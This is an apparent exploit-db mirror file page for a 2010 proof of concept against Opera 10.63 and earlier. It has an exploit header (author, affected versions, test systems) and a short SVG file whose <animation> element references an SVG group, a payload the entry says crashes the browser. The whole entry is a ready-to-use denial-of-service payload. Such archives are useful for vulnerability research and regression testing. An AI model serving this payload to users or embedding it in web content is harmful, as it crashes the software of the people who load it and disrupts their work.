exploit-db-mirror/platforms/multiple/dos/15273.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

12 lines
389 B
Text
Executable file

# Exploit Title: Opera Denial of Service by SVG <animation> Element
# Date: 16, October 2010
# Author: fla
# Software Link: http://www.opera.com/
# Version: 10.63 and previous
# Tested on: Ubuntu 10.10 x64, Windows 7 x64
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" >
<g id="animTest" ></g>
<animation xlink:href="#animTest" />
</svg>